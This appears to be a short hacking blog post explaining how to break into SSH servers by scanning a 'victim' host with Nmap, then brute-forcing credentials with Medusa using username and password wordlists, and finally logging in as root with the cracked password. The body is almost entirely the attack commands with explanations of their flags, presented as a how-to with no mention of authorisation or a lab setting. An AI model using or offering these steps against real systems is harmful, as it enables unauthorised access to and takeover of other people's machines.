Breaking Into Secure Shell (SSH) With Medusa

Description :
SSH Or Secure Shell is a network protocol where the client can exchange data through a secure network between the two devices as a remote network. is widely used in Operation systems GNU Linux and Unix.


About Medusa :
medusa is a cracker tools with fast service to display the password as "SSH, FTP, HTTP, MySQL, Telnet, VNC, Web Forms and more.

Equipments:
1. Medusa
2. Nmap

Scan victim host using Nmap
# nmap -sV xxx.xxx.xxx

-sV : Probe open ports to determine service/version info
xxx.xxx.xxx.xxx : ip-victim



seen in the picture above, the SSH service port 22 open. so, we can do the exploitable

# medusa -h xxx.xxx.xxx.xxx -U USER.txt -P PASS.txt -e ns -M ssh -v 4


-h     : Target hostname or IP address
-U    : File containing usernames
-P     : File containing passwords
-e     : Additional password checks ([n] No Password, [s] Password = Username)
-M   : Name of the module to execute
-v     Verbose level


ACCOUNT FOUND =))
User is a root
password is a r00t

Now, let's get the ssh login :

# ssh root@xxx.xxx.xxx.xxx


Success =)) we have access into the victim's computer

NOTE : at its base is not as easy as in the testing that I did, that you have to prepare is a wordlist and luck.


regards
Hidemichi-Hiroyuki a.k.a [H2]









Comments

Popular posts from this blog

Decrypt MD5 $Wordpress

Exploit Samba "SmbClient"

Configure Pure-FTP on Kali Linux